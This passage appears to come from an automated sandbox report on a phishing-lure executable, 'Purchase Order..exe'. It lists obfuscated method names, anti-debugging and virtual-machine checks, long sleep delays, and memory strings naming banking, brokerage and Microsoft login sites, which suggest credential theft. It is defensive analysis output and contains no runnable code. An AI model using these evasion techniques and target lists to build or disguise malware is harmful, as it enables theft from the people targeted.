                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, KWApDhrnlIMMKG7Lj2.csHigh entropy of concatenated method names: 'lJL47E80mJ', 'wX14R0JkJr', 'iwC444pI6D', 'piy4n9XWZX', 'Cr44E4yHw8', 'iN74QlDQZq', 'Dispose', 'WPXNfXgZbC', 'mGMNWkqBpY', 'XrENO15JpI'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, K20xuT5t8ka738jSGT.csHigh entropy of concatenated method names: 'vLyOAVUUuX', 'IkSO6ZyDQP', 'kaWO24yp39', 'WF2O58ls5C', 'gE3O7wI5tr', 'fMmOVHBXZ0', 'RrHORQuXeM', 'N2lONhSQHG', 'ammO4wB7u0', 'APZOXJnSex'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, bjs6Td2uGivbYQmp4T.csHigh entropy of concatenated method names: 'dFxWaCjuUg', 'BVlWMOPSiu', 'tPkWjaIyhW', 'hXAWyAxpHd', 'po8WimqyPE', 'dkWWHbgLld', 'iMWWrsx327', 'YDKWFbAwIt', 'lxTW9SuKRo', 'XfcWhPW6Fb'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, d15Cpq9BEDs8yelk45.csHigh entropy of concatenated method names: 'wlt4sa228h', 'mEM4tE0rIx', 'AW24Up2dfQ', 'FdT4Cs1ufX', 'xZj4DSIfFe', 'DaB4IQ30ew', 'hBY43ZlwqO', 'OWj4xWx73O', 'IkU4ZYwaBk', 'T8p4p9Z658'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, aBHJHV3DE8OaqpJiX6.csHigh entropy of concatenated method names: 'SLSgfL2GoI', 'CjsgOy9IJx', 'uc5glurxbU', 'PpHlhd2RSt', 'TeDlzGbl1G', 'URogTgbFZc', 'dssgSwQAU5', 'dBKgGn6HO9', 'bJ3gbN2g9h', 'JIHgJySrt4'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, b5CnbrzQsCtUglbpwt.csHigh entropy of concatenated method names: 'RKhX6kRZgZ', 'UGlX2jfwct', 'JGJX5pYbV7', 'kkmXsnLyxd', 'yo4Xthjpqj', 'q2AXCYVhwA', 'sXCXD4FMhg', 'xBMXQjpmYG', 'Mb6XLyIxdX', 'Y9MXYjS8rB'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, CawSNihv4RcLEZi9qp.csHigh entropy of concatenated method names: 'Hi0XOhXAuG', 'yFpX1eEmFQ', 'aYXXlBu9fr', 'NJxXgBJ5Oc', 'fxPX42VAEk', 'XWkX02esAU', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, vhYXNBSTvGVs4tjVGBX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pBUXqaB7nC', 'fVJXuhwyFw', 'vMhXPlxobd', 'l9hXatJbji', 'Yh0XMN4QSW', 'OQaXjyyolM', 'Jw4Xyn7wfv'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, we4V2XG0i6XbOcktoV.csHigh entropy of concatenated method names: 'f5RmhkTsF', 'TJNAIyoC7', 'pri6JeLUj', 'TnO80oQE3', 'QBB5rbQ3v', 'TgyKPU0kX', 'im7tErCJMWcQrnbHFu', 's59L9q7hkHxCDLopFs', 'c4ANReEuE', 'o9PXfY0GQ'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, AfEGgWHLTNYsIV8FDN.csHigh entropy of concatenated method names: 'auIRFs14o2', 'yeWRhqPAKV', 'SudNTv8vHW', 'LssNSCwmud', 'HpORqVwb0S', 'ICwRujtrT3', 'TinRPTlPiH', 'xwVRaW4iWU', 'w0xRMRtNxR', 'GICRjM41cT'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, tusbCoa6KHDaQKmnZL.csHigh entropy of concatenated method names: 'khE7pHUNjm', 'Xf07ufo6J8', 'Rdb7aEPVT6', 'b8I7MYCudZ', 'Lvs7t5R9op', 'zeT7Uw3RrA', 'CMi7Cl2fHf', 'mjX7DDrrB5', 't017Io3LmK', 'MIJ73w33kV'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, yYYhMwZcN3jPXYUdv8.csHigh entropy of concatenated method names: 'l37gLhbXSK', 'DLOgYbtfSG', 'xpwgmoNoP2', 'Y86gAPUcnZ', 'P5ggvPXWmW', 'HL8g6O2SJ4', 'FHlg8JGf1e', 'OYTg2qmsJG', 'V5Fg5BWGOP', 'FEwgKkid9a'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, McN3ZUSSuevx4UROYBK.csHigh entropy of concatenated method names: 'NjVXhpnQWu', 'BMhXzJDQp1', 'vUonTsG0gE', 'owHnSXyO1q', 'O80nGwmD6x', 'IfUnbEB6AT', 'BssnJwXgYj', 'G9NnwSMiqQ', 'W4Inf3iy2v', 'GAVnWu3DhS'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, pMF8XusKQTpZaPxHVF.csHigh entropy of concatenated method names: 'DBqlwetoya', 'SO7lWmmICZ', 'yT1l1UMMsq', 'edflgkBLq8', 'pZul0dAZ6K', 'L6N1id1Ptb', 'nGc1HUKYcq', 'yLn1rC1Eyu', 'Xv51FM4QWf', 'plY19UWoiL'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, qjI8eTCWdWAvnQBLyD.csHigh entropy of concatenated method names: 'NanlQxRx1Z', 'qqslLDUrww', 'hUjlmdYL6Y', 'GbxlA8fIp5', 'NISl6Ag1Jk', 'gipl8FXIwy', 'LSRl5t4NM6', 'z1SlKbkcaX', 'hb4IbESPQtWjLxu633Z', 'zWTZkaSJyN2MRZ7AHr0'
                Source: 0.2.Purchase Order..exe.7520000.4.raw.unpack, EoP4pFJAwENS4xQMlG.csHigh entropy of concatenated method names: 'mASSgjs6Td', 'PGiS0vbYQm', 'at8Soka738', 'SSGSkTKfJJ', 'nlJS7fSVMF', 'DXuSVKQTpZ', 'YwoPhs5iTwqroaV7ru', 'iDIOAeuWnGhdna21sQ', 'NkgSSB7y5h', 'Gv7SbLXF5n'
                Source: C:\Users\user\Desktop\Purchase Order..exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\isoburn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match File source: Process Memory Space: Purchase Order..exe PID: 1160, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\isoburn.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 1640000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 3050000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 2E50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 7F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 76F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 8F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Memory allocated: 9F00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A096E rdtsc 3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 3846
                Source: C:\Windows\SysWOW64\isoburn.exe Window / User API: threadDelayed 6127
                Source: C:\Users\user\Desktop\Purchase Order..exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exe API coverage: 2.7 %
                Source: C:\Users\user\Desktop\Purchase Order..exe TID: 3508 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768 Thread sleep count: 3846 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768 Thread sleep time: -7692000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768 Thread sleep count: 6127 > 30
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768 Thread sleep time: -12254000s >= -30000s
                Source: C:\Windows\SysWOW64\isoburn.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_0070C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0070C4E0
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                Source: l420377x.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: discord.comVMware20,11696494690f
                Source: l420377x.6.dr Binary or memory string: AMC password management pageVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: outlook.office.comVMware20,11696494690s
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2660933192.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: l420377x.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: l420377x.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: l420377x.6.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
                Source: l420377x.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rtal.azure.comVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e365.comVMware20,11696494690t
                Source: l420377x.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: l420377x.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: l420377x.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: last_fourVARCHARVMware
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: l420377x.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: l420377x.6.dr Binary or memory string: tasks.office.comVMware20,11696494690o
                Source: l420377x.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690Ad
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: dev.azure.comVMware20,11696494690j
                Source: l420377x.6.dr Binary or memory string: global block list test formVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ve Brokers - EU East & CentralVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: l420377x.6.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
                Source: l420377x.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,1
                Source: l420377x.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: l420377x.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Transaction PasswordVMware20,11696494690}
                Source: l420377x.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: firefox.exe, 0000000B.00000002.2131917870.0000017B7C30D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                Source: l420377x.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Purchase Order..exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Purchase Order..exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\isoburn.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A096E rdtsc 3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_00417723 LdrLoadDll,3_2_00417723
                Source: C:\Users\user\Desktop\Purchase Order..exe Code function: 3_2_018A0185 mov eax, dword ptr fs:[00000030h] 3_2_018A0185
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858397 mov eax, dword ptr fs:[00000030h]3_2_01858397
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858397 mov eax, dword ptr fs:[00000030h]3_2_01858397
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019043D4 mov eax, dword ptr fs:[00000030h]3_2_019043D4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019043D4 mov eax, dword ptr fs:[00000030h]3_2_019043D4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov ecx, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E63C0 mov eax, dword ptr fs:[00000030h]3_2_018E63C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191C3CD mov eax, dword ptr fs:[00000030h]3_2_0191C3CD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018963FF mov eax, dword ptr fs:[00000030h]3_2_018963FF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C310 mov ecx, dword ptr fs:[00000030h]3_2_0185C310
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01880310 mov ecx, dword ptr fs:[00000030h]3_2_01880310
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192A352 mov eax, dword ptr fs:[00000030h]3_2_0192A352
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01908350 mov ecx, dword ptr fs:[00000030h]3_2_01908350
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov ecx, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190437C mov eax, dword ptr fs:[00000030h]3_2_0190437C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E0283 mov eax, dword ptr fs:[00000030h]3_2_018E0283
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E0283 mov eax, dword ptr fs:[00000030h]3_2_018E0283
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E0283 mov eax, dword ptr fs:[00000030h]3_2_018E0283
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E284 mov eax, dword ptr fs:[00000030h]3_2_0189E284
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E284 mov eax, dword ptr fs:[00000030h]3_2_0189E284
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018702A0 mov eax, dword ptr fs:[00000030h]3_2_018702A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018702A0 mov eax, dword ptr fs:[00000030h]3_2_018702A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov eax, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov ecx, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov eax, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov eax, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov eax, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F62A0 mov eax, dword ptr fs:[00000030h]3_2_018F62A0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A2C3 mov eax, dword ptr fs:[00000030h]3_2_0186A2C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A2C3 mov eax, dword ptr fs:[00000030h]3_2_0186A2C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A2C3 mov eax, dword ptr fs:[00000030h]3_2_0186A2C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A2C3 mov eax, dword ptr fs:[00000030h]3_2_0186A2C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A2C3 mov eax, dword ptr fs:[00000030h]3_2_0186A2C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018702E1 mov eax, dword ptr fs:[00000030h]3_2_018702E1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018702E1 mov eax, dword ptr fs:[00000030h]3_2_018702E1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018702E1 mov eax, dword ptr fs:[00000030h]3_2_018702E1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185823B mov eax, dword ptr fs:[00000030h]3_2_0185823B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191A250 mov eax, dword ptr fs:[00000030h]3_2_0191A250
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191A250 mov eax, dword ptr fs:[00000030h]3_2_0191A250
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E8243 mov eax, dword ptr fs:[00000030h]3_2_018E8243
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E8243 mov ecx, dword ptr fs:[00000030h]3_2_018E8243
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A250 mov eax, dword ptr fs:[00000030h]3_2_0185A250
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866259 mov eax, dword ptr fs:[00000030h]3_2_01866259
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01910274 mov eax, dword ptr fs:[00000030h]3_2_01910274
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01864260 mov eax, dword ptr fs:[00000030h]3_2_01864260
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01864260 mov eax, dword ptr fs:[00000030h]3_2_01864260
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01864260 mov eax, dword ptr fs:[00000030h]3_2_01864260
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185826B mov eax, dword ptr fs:[00000030h]3_2_0185826B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01894588 mov eax, dword ptr fs:[00000030h]3_2_01894588
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01862582 mov eax, dword ptr fs:[00000030h]3_2_01862582
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01862582 mov ecx, dword ptr fs:[00000030h]3_2_01862582
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189E59C mov eax, dword ptr fs:[00000030h]3_2_0189E59C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E05A7 mov eax, dword ptr fs:[00000030h]3_2_018E05A7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E05A7 mov eax, dword ptr fs:[00000030h]3_2_018E05A7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E05A7 mov eax, dword ptr fs:[00000030h]3_2_018E05A7
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018845B1 mov eax, dword ptr fs:[00000030h]3_2_018845B1
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018845B1 mov eax, dword ptr fs:[00000030h]3_2_018845B1
